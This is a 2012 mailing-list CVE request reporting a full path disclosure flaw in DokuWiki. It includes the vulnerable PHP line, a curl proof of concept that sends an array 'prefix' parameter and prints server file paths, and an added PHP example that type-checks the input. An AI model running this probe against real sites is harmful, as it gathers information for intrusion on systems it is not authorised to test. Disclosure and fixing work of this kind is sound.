Date: Sun, 24 Jun 2012 09:40:13 -0300
From: Felipe Pena <>
Subject: CVE request: Full path disclosure in DokuWiki

Full path disclosure in DokuWiki
  DokuWiki is a simple to use Wiki aimed at the documentation needs of a small
company. It works on plain text files and thus needs no database. It has a
simple but powerful syntax which makes sure the datafiles remain readable
outside the Wiki.

  The POST input 'prefix' is not checked/cast for proper data type before
being passed to PHP's substr() function, which leads to the display of a
warning with sensitive information on a server with PHP error level enabled:

  $PRE   = cleanText(substr($_POST['prefix'], 0, -1));

$ curl -dprefix[]=1 http://localhost/dokuwiki/doku.php 2> /dev/null |
grep Warning
<b>Warning</b>:  substr() expects parameter 1 to be string, array given in
<b>/var/www/dokuwiki/doku.php</b> on line <b>47</b><br />
<b>Warning</b>:  Cannot modify header information - headers already sent by
(output started at /var/www/dokuwiki/doku.php:47) in
<b>/var/www/dokuwiki/inc/actions.php</b> on line <b>180</b><br />

Affected versions:
- Angua (RC1)
- Rincewind
- Anteater


This vulnerability was discovered by Felipe Pena.
Twitter: @felipensp

Felipe Pena
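
The type check missing from the line quoted in the message above, shown as an added example; this is not DokuWiki's code or its actual fix. request_string() and prefix_from_post() are hypothetical helpers, and the sample inputs are constructed.

```php
<?php
// Added example, not DokuWiki code. Helper names are hypothetical.

// Defence in depth: keep PHP diagnostics out of HTTP responses and in the log.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

/**
 * Return $source[$key] only when it is a string, otherwise $default.
 * A request body such as prefix[]=1 makes PHP build an array for
 * $_POST['prefix'], which is what triggered the substr() warning.
 */
function request_string(array $source, $key, $default = '')
{
    if (!isset($source[$key]) || !is_string($source[$key])) {
        return $default;
    }
    return $source[$key];
}

/** Type-checked form of: substr($_POST['prefix'], 0, -1) */
function prefix_from_post(array $post)
{
    $raw = request_string($post, 'prefix');
    // substr('', 0, -1) is false before PHP 8 and '' from PHP 8 on;
    // the cast gives callers a string in both cases.
    return (string) substr($raw, 0, -1);
}

// Constructed sample inputs standing in for $_POST.
$samples = array(
    'string'  => array('prefix' => 'some text.'),
    'array'   => array('prefix' => array('1')), // body sent as prefix[]=1
    'missing' => array(),
);

foreach ($samples as $name => $post) {
    printf("%-8s => %s\n", $name, var_export(prefix_from_post($post), true));
}
```

The array and missing cases both yield an empty string without raising a warning, so no file path is emitted regardless of the error display setting.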
